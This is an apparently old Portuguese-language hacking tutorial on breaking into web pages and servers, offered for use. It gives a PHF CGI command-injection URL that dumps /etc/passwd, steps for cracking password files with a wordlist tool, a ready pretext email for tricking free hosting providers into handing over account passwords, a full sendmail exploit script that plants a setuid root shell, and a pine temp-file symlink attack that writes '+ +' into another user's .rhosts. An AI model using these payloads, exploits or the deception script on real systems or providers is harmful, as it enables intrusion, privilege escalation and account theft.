www.Redehgb.Com - Simplesmente o Melhor

Invadindo Hp's

Precauções que vc deverá tomar quando hackear uma HP

Em primeiro lugar eu gostaria de avisar que hackear uma Home Page é crime, e dá cadeia.
Se vc não hackear uma HP corretamente, seu IP ficará gravado em algum lugar e isso fará com que eles saibam
quem foi.
Antes de fazer isso vc deverá estar preparado assim usando programas para hackear.

Senhas

A senha esta em um arquivo chamado password.
Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd.
Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix).
Uma senha encryptada é mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh

Agora o exemplo de uma senha com shadow

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/
pin4geo:/bin/falseftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*". Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas.

Desencriptando

Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha (passwd). O que é cada um? Word list- Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está a senha encryptada.

Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack passwd lista.txt

E pronto! A senha está desencryptada! Mas como isso funciona??
Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.

Invasão por PHF

O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no local do seu browser : http://Endereçodapage/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd

Apenas isso e pronto!

Hackeando Home Pages de Servidores Grátis

Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."

Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram acreditar e em 2 semanas (mais ou menos) você receberá a senha no seu e-mail!

Telnet e Exploits

Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin.... Vou listar alguns exploits abaixo :

Esse se chama sendmail bug.
Ele cria um programa /tmp/x que chama
shells como root.

cat << _EOF_>/tmp/x.c  

 #define RUN "/bin/ksh"  

 #include



  

 main()  

 {  

    execl(RUN,RUN,NULL);  

 }  

_EOF_  

#  

cat << _EOF_>/tmp/spawnfish.c  

 main()  

 {  

   execl("/usr/lib/sendmail","/tmp/smtpd",0);  

 }  

_EOF_  

#  

cat << _EOF_>/tmp/smtpd.c  

 main()  

 {  

   setuid(0); setgid(0);  

   system("chown root /tmp/x ;chmod 4755 /tmp/x");  

 }  

_EOF_  

#  

#  

gcc -O  -o /tmp/x /tmp/x.c  

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c  

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c  

#  

/tmp/spawnfish  

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed 

s/"[ ]*"// |cut -d" " -f1`  

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd 

/tmp/x.c  

sleep 5  

if [ -u /tmp/x ] ; then  

   echo "leet..."  

   /tmp/x  

fi

agora é um outro método.



catluvr (6 19:06) litterbox:~> ps -aux | grep pine  

catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep 

pine  

hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine  



catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors  

- -rw-rw-rw-   1 hamors   elite            4 Aug 26 19:05 

.302.f5a4  



catluvr (8 19:07) litterbox:~> ps -aux | grep pine  

catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep 

pine  



catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts 

/tmp/.302.f5a4  



hamors (23 19:09) litterbox:~> pine  



catluvr (11 19:10) litterbox:~> ps -aux | grep pine  

catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep 

pine  

hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine  



catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4  



catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4  

+ +  



catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4  



catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors